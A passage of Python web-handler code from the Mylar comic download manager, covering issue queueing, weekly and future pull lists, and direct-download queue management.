issues = myDB.selectone("SELECT IssueDate, ReleaseDate FROM annuals WHERE IssueID=?", [IssueID]).fetchone()
if ComicYear == None:
ComicYear = str(issues['IssueDate'])[:4]
if issues['ReleaseDate'] is None or issues['ReleaseDate'] == '0000-00-00':
logger.info('No Store Date found for given issue. This is probably due to not Refreshing the Series beforehand.')
logger.info('I Will assume IssueDate as Store Date, but you should probably Refresh the Series and try again if required.')
storedate = issues['IssueDate']
else:
storedate = issues['ReleaseDate']
if BookType == 'TPB':
logger.info('%s[%s] Now Queueing %s (%s) for search' % (moduletype, BookType, ComicName, SeriesYear))
elif ComicIssue is None:
logger.info('%s Now Queueing %s (%s) for search' % (moduletype, ComicName, SeriesYear))
else:
logger.info('%s Now Queueing %s (%s) #%s for search' % (moduletype, ComicName, SeriesYear, ComicIssue))
#s = mylar.SEARCH_QUEUE.put({'issueid': IssueID, 'comicname': ComicName, 'seriesyear': SeriesYear, 'comicid': ComicID, 'issuenumber': ComicIssue, 'booktype': BookType})
s = mylar.SEARCH_QUEUE.put(passinfo)
if manualsearch:
# if it's a manual search, return to null here so the thread will die and not cause http redirect errors.
return
if ComicID:
return cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % ComicID)
else:
return
#raise cherrypy.HTTPRedirect(redirect)
queueissue.exposed = True
def unqueueissue(self, IssueID, ComicID, ComicName=None, Issue=None, FutureID=None, mode=None, ReleaseComicID=None):
myDB = db.DBConnection()
if ComicName is None:
if ReleaseComicID is None: #ReleaseComicID is used for annuals.
issue = myDB.selectone('SELECT * FROM issues WHERE IssueID=?', [IssueID]).fetchone()
else:
issue = None
annchk = 'no'
if issue is None:
if mylar.CONFIG.ANNUALS_ON:
if ReleaseComicID is None:
issann = myDB.selectone('SELECT * FROM annuals WHERE IssueID=?', [IssueID]).fetchone()
else:
issann = myDB.selectone('SELECT * FROM annuals WHERE IssueID=? AND ReleaseComicID=?', [IssueID, ReleaseComicID]).fetchone()
ComicName = issann['ReleaseComicName']
IssueNumber = issann['Issue_Number']
annchk = 'yes'
ComicID = issann['ComicID']
ReleaseComicID = issann['ReleaseComicID']
else:
ComicName = issue['ComicName']
IssueNumber = issue['Issue_Number']
controlValueDict = {"IssueID": IssueID}
if mode == 'failed' and mylar.CONFIG.FAILED_DOWNLOAD_HANDLING:
logger.info(u"Marking " + ComicName + " issue # " + IssueNumber + " as Failed...")
newValueDict = {"Status": "Failed"}
myDB.upsert("failed", newValueDict, controlValueDict)
if annchk == 'yes':
myDB.upsert("annuals", newValueDict, controlValueDict)
else:
myDB.upsert("issues", newValueDict, controlValueDict)
self.failed_handling(ComicID=ComicID, IssueID=IssueID)
else:
logger.info(u"Marking " + ComicName + " issue # " + IssueNumber + " as Skipped...")
newValueDict = {"Status": "Skipped"}
if annchk == 'yes':
myDB.upsert("annuals", newValueDict, controlValueDict)
else:
myDB.upsert("issues", newValueDict, controlValueDict)
else:
#if ComicName is not None, then it's from the FuturePull list that we're 'unwanting' an issue.
#ComicID may be present if it's a watch from the Watchlist, otherwise it won't exist.
if ComicID is not None and ComicID != 'None':
logger.info('comicid present:' + str(ComicID))
thefuture = myDB.selectone('SELECT * FROM future WHERE ComicID=?', [ComicID]).fetchone()
else:
logger.info('FutureID: ' + str(FutureID))
logger.info('no comicid - ComicName: ' + str(ComicName) + ' -- Issue: #' + Issue)
thefuture = myDB.selectone('SELECT * FROM future WHERE FutureID=?', [FutureID]).fetchone()
if thefuture is None:
logger.info('Cannot find the corresponding issue in the Futures List for some reason. This is probably an Error.')
else:
logger.info('Marking ' + thefuture['COMIC'] + ' issue # ' + thefuture['ISSUE'] + ' as skipped...')
if ComicID is not None and ComicID != 'None':
cVDict = {"ComicID": thefuture['ComicID']}
else:
cVDict = {"FutureID": thefuture['FutureID']}
nVDict = {"Status": "Skipped"}
logger.info('cVDict:' + str(cVDict))
logger.info('nVDict:' + str(nVDict))
myDB.upsert("future", nVDict, cVDict)
unqueueissue.exposed = True
def failed_handling(self, ComicID, IssueID):
import Queue
queue = Queue.Queue()
FailProcess = Failed.FailedProcessor(issueid=IssueID, comicid=ComicID, queue=queue)
thread_ = threading.Thread(target=FailProcess.Process, name="FAILED Post-Processing")
thread_.start()
thread_.join()
failchk = queue.get()
if failchk[0]['mode'] == 'retry':
logger.info('Attempting to return to search module with ' + str(failchk[0]['issueid']))
if failchk[0]['annchk'] == 'no': mode = 'want'
else: mode = 'want_ann'
self.queueit(mode=mode, ComicName=failchk[0]['comicname'], ComicIssue=failchk[0]['issuenumber'], ComicID=failchk[0]['comicid'], IssueID=failchk[0]['issueid'], manualsearch=True)
elif failchk[0]['mode'] == 'stop':
pass
else:
logger.error('mode is unsupported: ' + failchk[0]['mode'])
failed_handling.exposed = True
def archiveissue(self, IssueID, comicid):
myDB = db.DBConnection()
issue = myDB.selectone('SELECT * FROM issues WHERE IssueID=?', [IssueID]).fetchone()
annchk = 'no'
if issue is None:
if mylar.CONFIG.ANNUALS_ON:
issann = myDB.selectone('SELECT * FROM annuals WHERE IssueID=?', [IssueID]).fetchone()
comicname = issann['ReleaseComicName']
issue = issann['Issue_Number']
annchk = 'yes'
comicid = issann['ComicID']
else:
comicname = issue['ComicName']
issue = issue['Issue_Number']
logger.info(u"Marking " + comicname + " issue # " + str(issue) + " as archived...")
controlValueDict = {'IssueID': IssueID}
newValueDict = {'Status': 'Archived'}
if annchk == 'yes':
myDB.upsert("annuals", newValueDict, controlValueDict)
else:
myDB.upsert("issues", newValueDict, controlValueDict)
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
archiveissue.exposed = True
def pullSearch(self, week, year):
myDB = db.DBConnection()
#retrieve a list of all the issues that are in a Wanted state from the pull that we can search for.
ps = myDB.select("SELECT * from weekly WHERE Status='Wanted' AND weeknumber=? AND year=?", [int(week), year])
if ps is None:
logger.info('No items are marked as Wanted on the pullist to be searched for at this time')
return
issuesToSearch = []
for p in ps:
if p['IssueID'] is not None:
issuesToSearch.append(p['IssueID'])
if len(issuesToSearch) > 0:
logger.info('Now force searching for ' + str(len(issuesToSearch)) + ' issues from the pullist for week ' + str(week))
threading.Thread(target=search.searchIssueIDList, args=[issuesToSearch]).start()
else:
logger.info('Issues are marked as Wanted, but no issue information is available yet so I cannot search for anything. Try Recreating the pullist if you think this is error.')
return
pullSearch.exposed = True
def pullist(self, week=None, year=None, generateonly=False, current=None):
myDB = db.DBConnection()
autowant = []
if generateonly is False:
autowants = myDB.select("SELECT * FROM futureupcoming WHERE Status='Wanted'")
if autowants:
for aw in autowants:
autowant.append({"ComicName": aw['ComicName'],
"IssueNumber": aw['IssueNumber'],
"Publisher": aw['Publisher'],
"Status": aw['Status'],
"DisplayComicName": aw['DisplayComicName']})
weeklyresults = []
wantedcount = 0
weekinfo = helpers.weekly_info(week, year, current)
popit = myDB.select("SELECT * FROM sqlite_master WHERE name='weekly' and type='table'")
if popit:
w_results = myDB.select("SELECT * from weekly WHERE weeknumber=? AND year=?", [int(weekinfo['weeknumber']),weekinfo['year']])
if len(w_results) == 0:
logger.info('trying to repopulate to week: ' + str(weekinfo['weeknumber']) + '-' + str(weekinfo['year']))
repoll = self.manualpull(weeknumber=weekinfo['weeknumber'],year=weekinfo['year'])
if repoll['status'] == 'success':
w_results = myDB.select("SELECT * from weekly WHERE weeknumber=? AND year=?", [int(weekinfo['weeknumber']),weekinfo['year']])
else:
logger.warn('Problem repopulating the pullist for week ' + str(weekinfo['weeknumber']) + ', ' + str(weekinfo['year']))
if mylar.CONFIG.ALT_PULL == 2:
logger.warn('Attempting to repoll against legacy pullist in order to have some kind of updated listing for the week.')
repoll = self.manualpull()
if repoll['status'] == 'success':
w_results = myDB.select("SELECT * from weekly WHERE weeknumber=? AND year=?", [int(weekinfo['weeknumber']),weekinfo['year']])
else:
logger.warn('Unable to populate the pull-list. Not continuing at this time (will try again in abit)')
if all([w_results is None, generateonly is False]):
return serve_template(templatename="weeklypull.html", title="Weekly Pull", weeklyresults=weeklyresults, pullfilter=True, weekfold=weekinfo['week_folder'], wantedcount=0, weekinfo=weekinfo)
watchlibrary = helpers.listLibrary()
issueLibrary = helpers.listIssues(weekinfo['weeknumber'], weekinfo['year'])
oneofflist = helpers.listoneoffs(weekinfo['weeknumber'], weekinfo['year'])
chklist = []
for weekly in w_results:
xfound = False
tmp_status = weekly['Status']
if weekly['ComicID'] in watchlibrary:
haveit = watchlibrary[weekly['ComicID']]['comicid']
if weekinfo['weeknumber']:
if watchlibrary[weekly['ComicID']]['status'] == 'Paused':
tmp_status = 'Paused'
elif any([week >= int(weekinfo['weeknumber']), week is None]) and all([mylar.CONFIG.AUTOWANT_UPCOMING, tmp_status == 'Skipped']):
tmp_status = 'Wanted'
for x in issueLibrary:
if weekly['IssueID'] == x['IssueID'] and tmp_status != 'Paused':
xfound = True
tmp_status = x['Status']
break
else:
xlist = [x['Status'] for x in oneofflist if x['IssueID'] == weekly['IssueID']]
if xlist:
haveit = 'OneOff'
tmp_status = xlist[0]
else:
haveit = "No"
linkit = None
if all([weekly['ComicID'] is not None, weekly['ComicID'] != '', haveit == 'No']) or haveit == 'OneOff':
linkit = 'http://comicvine.gamespot.com/volume/4050-' + str(weekly['ComicID'])
else:
#setting it here will force it to set the link to the right comicid regardless of annuals or not
linkit = haveit
x = None
try:
x = float(weekly['ISSUE'])
except ValueError, e:
if 'au' in weekly['ISSUE'].lower() or 'ai' in weekly['ISSUE'].lower() or '.inh' in weekly['ISSUE'].lower() or '.now' in weekly['ISSUE'].lower() or '.mu' in weekly['ISSUE'].lower() or '.hu' in weekly['ISSUE'].lower():
x = weekly['ISSUE']
if x is not None:
if not autowant:
weeklyresults.append({
"PUBLISHER": weekly['PUBLISHER'],
"ISSUE": weekly['ISSUE'],
"COMIC": weekly['COMIC'],
"STATUS": tmp_status,
"COMICID": weekly['ComicID'],
"ISSUEID": weekly['IssueID'],
"VOLUME": weekly['volume'],
"SERIESYEAR": weekly['seriesyear'],
"HAVEIT": haveit,
"LINK": linkit,
"HASH": None,
"AUTOWANT": False,
"FORMAT": weekly['format']
})
else:
if any(x['ComicName'].lower() == weekly['COMIC'].lower() for x in autowant):
weeklyresults.append({
"PUBLISHER": weekly['PUBLISHER'],
"ISSUE": weekly['ISSUE'],
"COMIC": weekly['COMIC'],
"STATUS": tmp_status,
"COMICID": weekly['ComicID'],
"ISSUEID": weekly['IssueID'],
"VOLUME": weekly['volume'],
"SERIESYEAR": weekly['seriesyear'],
"HAVEIT": haveit,
"LINK": linkit,
"HASH": None,
"AUTOWANT": True,
"FORMAT": weekly['format']
})
else:
weeklyresults.append({
"PUBLISHER": weekly['PUBLISHER'],
"ISSUE": weekly['ISSUE'],
"COMIC": weekly['COMIC'],
"STATUS": tmp_status,
"COMICID": weekly['ComicID'],
"ISSUEID": weekly['IssueID'],
"VOLUME": weekly['volume'],
"SERIESYEAR": weekly['seriesyear'],
"HAVEIT": haveit,
"LINK": linkit,
"HASH": None,
"AUTOWANT": False,
"FORMAT": weekly['format']
})
if tmp_status == 'Wanted':
wantedcount +=1
elif tmp_status == 'Snatched':
chklist.append(str(weekly['IssueID']))
weeklyresults = sorted(weeklyresults, key=itemgetter('PUBLISHER', 'COMIC'), reverse=False)
else:
self.manualpull()
if generateonly is True:
return weeklyresults, weekinfo
else:
endresults = []
if len(chklist) > 0:
for genlist in helpers.chunker(chklist, 200):
tmpsql = "SELECT * FROM snatched where Status='Snatched' and status != 'Post-Processed' and (provider='32P' or Provider='WWT' or Provider='DEM') AND IssueID in ({seq})".format(seq=','.join(['?'] *(len(genlist))))
chkthis = myDB.select(tmpsql, genlist)
if chkthis is None:
continue
else:
for w in weeklyresults:
weekit = w
snatchit = [x['hash'] for x in chkthis if w['ISSUEID'] == x['IssueID']]
try:
if snatchit:
logger.fdebug('[%s] Discovered previously snatched torrent not downloaded. Marking for manual auto-snatch retrieval: %s' % (w['COMIC'], ''.join(snatchit)))
weekit['HASH'] = ''.join(snatchit)
else:
weekit['HASH'] = None
except:
weekit['HASH'] = None
endresults.append(weekit)
weeklyresults = endresults
if week:
return serve_template(templatename="weeklypull.html", title="Weekly Pull", weeklyresults=weeklyresults, pullfilter=True, weekfold=weekinfo['week_folder'], wantedcount=wantedcount, weekinfo=weekinfo)
else:
return serve_template(templatename="weeklypull.html", title="Weekly Pull", weeklyresults=weeklyresults, pullfilter=True, weekfold=weekinfo['week_folder'], wantedcount=wantedcount, weekinfo=weekinfo)
pullist.exposed = True
def removeautowant(self, comicname, release):
myDB = db.DBConnection()
logger.fdebug('Removing ' + comicname + ' from the auto-want list.')
myDB.action("DELETE FROM futureupcoming WHERE ComicName=? AND IssueDate=? AND Status='Wanted'", [comicname, release])
removeautowant.exposed = True
def futurepull(self):
from mylar import solicit
#get month-year here, and self-populate in future
now = datetime.datetime.now()
if len(str(now.month)) != 2:
month = '0' + str(now.month)
else:
month = str(now.month)
year = str(now.year)
logger.fdebug('month = ' + str(month))
logger.fdebug('year = ' + str(year))
threading.Thread(target=solicit.solicit, args=[month, year]).start()
raise cherrypy.HTTPRedirect("futurepulllist")
futurepull.exposed = True
def futurepulllist(self):
myDB = db.DBConnection()
futureresults = []
watchresults = []
popthis = myDB.select("SELECT * FROM sqlite_master WHERE name='futureupcoming' and type='table'")
if popthis:
l_results = myDB.select("SELECT * FROM futureupcoming WHERE Status='Wanted'")
for lres in l_results:
watchresults.append({
"ComicName": lres['ComicName'],
"IssueNumber": lres['IssueNumber'],
"ComicID": lres['ComicID'],
"IssueDate": lres['IssueDate'],
"Publisher": lres['Publisher'],
"Status": lres['Status']
})
logger.fdebug('There are ' + str(len(watchresults)) + ' issues that you are watching for but are not on your watchlist yet.')
popit = myDB.select("SELECT * FROM sqlite_master WHERE name='future' and type='table'")
if popit:
f_results = myDB.select("SELECT SHIPDATE, PUBLISHER, ISSUE, COMIC, EXTRA, STATUS, ComicID, FutureID from future")
for future in f_results:
x = None
if future['ISSUE'] is None: break
try:
x = float(future['ISSUE'])
except ValueError, e:
if 'au' in future['ISSUE'].lower() or 'ai' in future['ISSUE'].lower() or '.inh' in future['ISSUE'].lower() or '.now' in future['ISSUE'].lower() or '.mu' in future['ISSUE'].lower() or '.hu' in future['ISSUE'].lower():
x = future['ISSUE']
if future['EXTRA'] == 'N/A' or future['EXTRA'] == '':
future_extra = ''
else:
future_extra = future['EXTRA']
if '(of' in future['EXTRA'].lower():
future_extra = re.sub('[\(\)]', '', future['EXTRA'])
if x is not None:
#here we check the status to make sure it's ok since we loaded all the Watch For earlier.
chkstatus = future['STATUS']
for wr in watchresults:
if wr['ComicName'] == future['COMIC'] and wr['IssueNumber'] == future['ISSUE']:
logger.info('matched on Name: ' + wr['ComicName'] + ' to ' + future['COMIC'])
logger.info('matched on Issue: #' + wr['IssueNumber'] + ' to #' + future['ISSUE'])
logger.info('matched on ID: ' + str(wr['ComicID']) + ' to ' + str(future['ComicID']))
chkstatus = wr['Status']
break
futureresults.append({
"SHIPDATE": future['SHIPDATE'],
"PUBLISHER": future['PUBLISHER'],
"ISSUE": future['ISSUE'],
"COMIC": future['COMIC'],
"EXTRA": future_extra,
"STATUS": chkstatus,
"COMICID": future['ComicID'],
"FUTUREID": future['FutureID']
})
futureresults = sorted(futureresults, key=itemgetter('SHIPDATE', 'PUBLISHER', 'COMIC'), reverse=False)
else:
logger.error('No results to post for upcoming issues...something is probably wrong')
return
return serve_template(templatename="futurepull.html", title="future Pull", futureresults=futureresults, pullfilter=True)
futurepulllist.exposed = True
def add2futurewatchlist(self, ComicName, Issue, Publisher, ShipDate, weeknumber, year, FutureID=None):
#ShipDate is just weekinfo['midweek'] #a tuple ('weeknumber','startweek','midweek','endweek','year')
myDB = db.DBConnection()
logger.info(ShipDate)
if FutureID is not None:
chkfuture = myDB.selectone('SELECT * FROM futureupcoming WHERE ComicName=? AND IssueNumber=? WHERE weeknumber=? AND year=?', [ComicName, Issue, weeknumber, year]).fetchone()
if chkfuture is not None:
logger.info('Already on Future Upcoming list - not adding at this time.')
return
logger.info('Adding ' + ComicName + ' # ' + str(Issue) + ' [' + Publisher + '] to future upcoming watchlist')
newCtrl = {"ComicName": ComicName,
"IssueNumber": Issue,
"Publisher": Publisher}
newVal = {"Status": "Wanted",
"IssueDate": ShipDate,
"weeknumber": weeknumber,
"year": year}
myDB.upsert("futureupcoming", newVal, newCtrl)
if FutureID is not None:
fCtrl = {"FutureID": FutureID}
fVal = {"Status": "Wanted"}
myDB.upsert("future", fVal, fCtrl)
add2futurewatchlist.exposed = True
def future_check(self):
weeklypull.future_check()
raise cherrypy.HTTPRedirect("upcoming")
future_check.exposed = True
def filterpull(self):
myDB = db.DBConnection()
weeklyresults = myDB.select("SELECT * from weekly")
pulldate = myDB.selectone("SELECT * from weekly").fetchone()
if pulldate is None:
raise cherrypy.HTTPRedirect("home")
return serve_template(templatename="weeklypull.html", title="Weekly Pull", weeklyresults=weeklyresults, pulldate=pulldate['SHIPDATE'], pullfilter=True)
filterpull.exposed = True
def manualpull(self,weeknumber=None,year=None):
logger.info('ALT_PULL: ' + str(mylar.CONFIG.ALT_PULL) + ' PULLBYFILE: ' + str(mylar.PULLBYFILE) + ' week: ' + str(weeknumber) + ' year: ' + str(year))
if all([mylar.CONFIG.ALT_PULL == 2, mylar.PULLBYFILE is False]) and weeknumber:
return mylar.locg.locg(weeknumber=weeknumber,year=year)
#raise cherrypy.HTTPRedirect("pullist?week=" + str(weeknumber) + "&year=" + str(year))
else:
weeklypull.pullit()
return {'status' : 'success'}
manualpull.exposed = True
def pullrecreate(self, weeknumber=None, year=None):
myDB = db.DBConnection()
forcecheck = 'yes'
if weeknumber is None:
myDB.action("DROP TABLE weekly")
mylar.dbcheck()
logger.info("Deleted existing pull-list data. Recreating Pull-list...")
else:
myDB.action('DELETE FROM weekly WHERE weeknumber=? and year=?', [int(weeknumber), int(year)])
logger.info("Deleted existing pull-list data for week %s, %s. Now Recreating the Pull-list..." % (weeknumber, year))
weeklypull.pullit(forcecheck, weeknumber, year)
weeklypull.future_check()
pullrecreate.exposed = True
def upcoming(self):
todaydate = datetime.datetime.today()
current_weeknumber = todaydate.strftime("%U")
#find the given week number for the current day
weeknumber = current_weeknumber
stweek = datetime.datetime.strptime(todaydate.strftime('%Y-%m-%d'), '%Y-%m-%d')
startweek = stweek - timedelta(days = (stweek.weekday() + 1) % 7)
midweek = startweek + timedelta(days = 3)
endweek = startweek + timedelta(days = 6)
weekyear = todaydate.strftime("%Y")
myDB = db.DBConnection()
#upcoming = myDB.select("SELECT * from issues WHERE ReleaseDate > date('now') order by ReleaseDate DESC")
#upcomingdata = myDB.select("SELECT * from upcoming WHERE IssueID is NULL AND IssueNumber is not NULL AND ComicName is not NULL order by IssueDate DESC")
#upcomingdata = myDB.select("SELECT * from upcoming WHERE IssueNumber is not NULL AND ComicName is not NULL order by IssueDate DESC")
upcomingdata = myDB.select("SELECT * from weekly WHERE Issue is not NULL AND Comic is not NULL order by weeknumber DESC")
if upcomingdata is None:
logger.info('No upcoming data as of yet...')
else:
futureupcoming = []
upcoming = []
upcoming_count = 0
futureupcoming_count = 0
#try:
# pull_date = myDB.selectone("SELECT SHIPDATE from weekly").fetchone()
# if (pull_date is None):
# pulldate = '00000000'
# else:
# pulldate = pull_date['SHIPDATE']
#except (sqlite3.OperationalError, TypeError), msg:
# logger.info(u"Error Retrieving weekly pull list - attempting to adjust")
# pulldate = '00000000'
for upc in upcomingdata:
# if len(upc['IssueDate']) <= 7:
# #if it's less than or equal 7, then it's a future-pull so let's check the date and display
# #tmpdate = datetime.datetime.com
# tmpdatethis = upc['IssueDate']
# if tmpdatethis[:2] == '20':
# tmpdate = tmpdatethis + '01' #in correct format of yyyymm
# else:
# findst = tmpdatethis.find('-') #find the '-'
# tmpdate = tmpdatethis[findst +1:] + tmpdatethis[:findst] + '01' #rebuild in format of yyyymm
# #timenow = datetime.datetime.now().strftime('%Y%m')
# else:
# #if it's greater than 7 it's a full date.
# tmpdate = re.sub("[^0-9]", "", upc['IssueDate']) #convert date to numerics only (should be in yyyymmdd)
# timenow = datetime.datetime.now().strftime('%Y%m%d') #convert to yyyymmdd
# #logger.fdebug('comparing pubdate of: ' + str(tmpdate) + ' to now date of: ' + str(timenow))
# pulldate = re.sub("[^0-9]", "", pulldate) #convert pulldate to numerics only (should be in yyyymmdd)
# if int(tmpdate) >= int(timenow) and int(tmpdate) == int(pulldate): #int(pulldate) <= int(timenow):
mylar.WANTED_TAB_OFF = False
try:
ab = int(upc['weeknumber'])
bc = int(upc['year'])
except TypeError:
logger.warn('Weekly Pull hasn\'t finished being generated as of yet (or has yet to initialize). Try to wait up to a minute to accomodate processing.')
mylar.WANTED_TAB_OFF = True
myDB.action("DROP TABLE weekly")
mylar.dbcheck()
logger.info("Deleted existed pull-list data. Recreating Pull-list...")
forcecheck = 'yes'
return threading.Thread(target=weeklypull.pullit, args=[forcecheck]).start()
if int(upc['weeknumber']) == int(weeknumber) and int(upc['year']) == int(weekyear):
if upc['Status'] == 'Wanted':
upcoming_count +=1
upcoming.append({"ComicName": upc['Comic'],
"IssueNumber": upc['Issue'],
"IssueDate": upc['ShipDate'],
"ComicID": upc['ComicID'],
"IssueID": upc['IssueID'],
"Status": upc['Status'],
"WeekNumber": upc['weeknumber'],
"DynamicName": upc['DynamicName']})
else:
if int(upc['weeknumber']) > int(weeknumber) and upc['Status'] == 'Wanted':
futureupcoming_count +=1
futureupcoming.append({"ComicName": upc['Comic'],
"IssueNumber": upc['Issue'],
"IssueDate": upc['ShipDate'],
"ComicID": upc['ComicID'],
"IssueID": upc['IssueID'],
"Status": upc['Status'],
"WeekNumber": upc['weeknumber'],
"DynamicName": upc['DynamicName']})
# elif int(tmpdate) >= int(timenow):
# if len(upc['IssueDate']) <= 7:
# issuedate = tmpdate[:4] + '-' + tmpdate[4:6] + '-00'
# else:
# issuedate = upc['IssueDate']
# if upc['Status'] == 'Wanted':
# futureupcoming_count +=1
# futureupcoming.append({"ComicName": upc['ComicName'],
# "IssueNumber": upc['IssueNumber'],
# "IssueDate": issuedate,
# "ComicID": upc['ComicID'],
# "IssueID": upc['IssueID'],
# "Status": upc['Status'],
# "DisplayComicName": upc['DisplayComicName']})
futureupcoming = sorted(futureupcoming, key=itemgetter('IssueDate', 'ComicName', 'IssueNumber'), reverse=True)
#fix None DateAdded points here
helpers.DateAddedFix()
issues = myDB.select("SELECT * from issues WHERE Status='Wanted'")
if mylar.CONFIG.UPCOMING_STORYARCS is True:
arcs = myDB.select("SELECT * from storyarcs WHERE Status='Wanted'")
else:
arcs = []
if mylar.CONFIG.UPCOMING_SNATCHED is True:
issues += myDB.select("SELECT * from issues WHERE Status='Snatched'")
if mylar.CONFIG.UPCOMING_STORYARCS is True:
arcs += myDB.select("SELECT * from storyarcs WHERE Status='Snatched'")
if mylar.CONFIG.FAILED_DOWNLOAD_HANDLING is True:
issues += myDB.select("SELECT * from issues WHERE Status='Failed'")
if mylar.CONFIG.UPCOMING_STORYARCS is True:
arcs += myDB.select("SELECT * from storyarcs WHERE Status='Failed'")
if mylar.CONFIG.UPCOMING_STORYARCS is True:
issues += arcs
isCounts = {}
isCounts[1] = 0 #1 wanted
isCounts[2] = 0 #2 snatched
isCounts[3] = 0 #3 failed
isCounts[4] = 0 #3 wantedTier
ann_list = []
ann_cnt = 0
if mylar.CONFIG.ANNUALS_ON:
#let's add the annuals to the wanted table so people can see them
#ComicName wasn't present in db initially - added on startup chk now.
annuals_list = myDB.select("SELECT * FROM annuals WHERE Status='Wanted'")
if mylar.CONFIG.UPCOMING_SNATCHED:
annuals_list += myDB.select("SELECT * FROM annuals WHERE Status='Snatched'")
if mylar.CONFIG.FAILED_DOWNLOAD_HANDLING:
annuals_list += myDB.select("SELECT * FROM annuals WHERE Status='Failed'")
# anncnt = myDB.select("SELECT COUNT(*) FROM annuals WHERE Status='Wanted' OR Status='Snatched'")
# ann_cnt = anncnt[0][0]
ann_list += annuals_list
issues += annuals_list
issues_tmp = sorted(issues, key=itemgetter('ReleaseDate'), reverse=True)
issues_tmp1 = sorted(issues_tmp, key=itemgetter('DateAdded'), reverse=True)
issues = sorted(issues_tmp1, key=itemgetter('Status'), reverse=True)
for curResult in issues:
baseissues = {'wanted': 1, 'snatched': 2, 'failed': 3}
for seas in baseissues:
if curResult['Status'] is None:
continue
else:
if seas in curResult['Status'].lower():
if all([curResult['DateAdded'] <= mylar.SEARCH_TIER_DATE, curResult['Status'] == 'Wanted']):
isCounts[4]+=1
else:
sconv = baseissues[seas]
isCounts[sconv]+=1
continue
isCounts = {"Wanted": str(isCounts[1]),
"Snatched": str(isCounts[2]),
"Failed": str(isCounts[3]),
"StoryArcs": str(len(arcs)),
"WantedTier": str(isCounts[4])}
iss_cnt = int(isCounts['Wanted'])
wantedcount = iss_cnt + int(isCounts['WantedTier']) # + ann_cnt
#let's straightload the series that have no issue data associated as of yet (ie. new series) from the futurepulllist
future_nodata_upcoming = myDB.select("SELECT * FROM futureupcoming WHERE IssueNumber='1' OR IssueNumber='0'")
#let's move any items from the upcoming table into the wanted table if the date has already passed.
#gather the list...
mvupcome = myDB.select("SELECT * from upcoming WHERE IssueDate < date('now') order by IssueDate DESC")
#get the issue ID's
for mvup in mvupcome:
myissue = myDB.selectone("SELECT ComicName, Issue_Number, IssueID, ComicID FROM issues WHERE IssueID=?", [mvup['IssueID']]).fetchone()
#myissue = myDB.action("SELECT * FROM issues WHERE Issue_Number=?", [mvup['IssueNumber']]).fetchone()
if myissue is None: pass
else:
logger.fdebug("--Updating Status of issues table because of Upcoming status--")
logger.fdebug("ComicName: " + str(myissue['ComicName']))
logger.fdebug("Issue number : " + str(myissue['Issue_Number']))
mvcontroldict = {"IssueID": myissue['IssueID']}
mvvalues = {"ComicID": myissue['ComicID'],
"Status": "Wanted"}
myDB.upsert("issues", mvvalues, mvcontroldict)
#remove old entry from upcoming so it won't try to continually download again.
logger.fdebug('[DELETE] - ' + mvup['ComicName'] + ' issue #: ' + str(mvup['IssueNumber']))
deleteit = myDB.action("DELETE from upcoming WHERE ComicName=? AND IssueNumber=?", [mvup['ComicName'], mvup['IssueNumber']])
return serve_template(templatename="upcoming.html", title="Upcoming", upcoming=upcoming, issues=issues, ann_list=ann_list, futureupcoming=futureupcoming, future_nodata_upcoming=future_nodata_upcoming, futureupcoming_count=futureupcoming_count, upcoming_count=upcoming_count, wantedcount=wantedcount, isCounts=isCounts)
upcoming.exposed = True
def skipped2wanted(self, comicid, fromupdate=None):
# change all issues for a given ComicID that are Skipped, into Wanted.
issuestowanted = []
issuesnumwant = []
myDB = db.DBConnection()
skipped2 = myDB.select("SELECT * from issues WHERE ComicID=? AND Status='Skipped'", [comicid])
for skippy in skipped2:
mvcontroldict = {"IssueID": skippy['IssueID']}
mvvalues = {"Status": "Wanted"}
myDB.upsert("issues", mvvalues, mvcontroldict)
issuestowanted.append(skippy['IssueID'])
issuesnumwant.append(skippy['Issue_Number'])
if len(issuestowanted) > 0:
if fromupdate is None:
logger.info("Marking issues: %s as Wanted" % issuesnumwant)
threading.Thread(target=search.searchIssueIDList, args=[issuestowanted]).start()
else:
logger.info('Marking issues: %s as Wanted' & issuesnumwant)
logger.info('These will be searched for on next Search Scan / Force Check')
return
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % [comicid])
skipped2wanted.exposed = True
def annualDelete(self, comicid, ReleaseComicID=None):
myDB = db.DBConnection()
if ReleaseComicID is None:
myDB.action("DELETE FROM annuals WHERE ComicID=?", [comicid])
logger.fdebug("Deleted all annuals from DB for ComicID of " + str(comicid))
else:
myDB.action("DELETE FROM annuals WHERE ReleaseComicID=?", [ReleaseComicID])
logger.fdebug("Deleted selected annual from DB with a ComicID of " + str(ReleaseComicID))
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % [comicid])
annualDelete.exposed = True
def ddl_requeue(self, mode, id=None):
myDB = db.DBConnection()
if id is None:
items = myDB.select("SELECT * FROM ddl_info WHERE status = 'Queued' ORDER BY updated_date DESC")
else:
oneitem = myDB.selectone("SELECT * FROM DDL_INFO WHERE ID=?", [id]).fetchone()
items = [oneitem]
itemlist = [x for x in items]
if itemlist is not None:
for item in itemlist:
if all([mylar.CONFIG.DDL_AUTORESUME is True, mode == 'resume', item['status'] != 'Completed']):
try:
filesize = os.stat(os.path.join(mylar.CONFIG.DDL_LOCATION, item['filename'])).st_size
except:
filesize = 0
resume = filesize
elif mode == 'abort':
myDB.upsert("ddl_info", {'Status': 'Failed'}, {'id': id}) #DELETE FROM ddl_info where ID=?', [id])
continue
elif mode == 'remove':
myDB.action('DELETE FROM ddl_info where ID=?', [id])
continue
else:
resume = None
mylar.DDL_QUEUE.put({'link': item['link'],
'mainlink': item['mainlink'],
'series': item['series'],
'year': item['year'],
'size': item['size'],
'comicid': item['comicid'],
'issueid': item['issueid'],
'id': item['id'],
'resume': resume})
linemessage = '%s successful for %s' % (mode, oneitem['series'])
if mode == 'restart_queue':
logger.info('[DDL-RESTART-QUEUE] DDL Queue successfully restarted. Put %s items back into the queue for downloading..' % len(itemlist))
linemessage = 'Successfully restarted Queue'
elif mode == 'restart':
logger.info('[DDL-RESTART] Successfully restarted %s [%s] for downloading..' % (oneitem['series'], oneitem['size']))
elif mode == 'requeue':
logger.info('[DDL-REQUEUE] Successfully requeued %s [%s] for downloading..' % (oneitem['series'], oneitem['size']))
elif mode == 'abort':
logger.info('[DDL-ABORT] Successfully aborted downloading of %s [%s]..' % (oneitem['series'], oneitem['size']))
elif mode == 'remove':
logger.info('[DDL-REMOVE] Successfully removed %s [%s]..' % (oneitem['series'], oneitem['size']))
return json.dumps({'status': True, 'message': linemessage})
ddl_requeue.exposed = True
def queueManage(self): # **args):
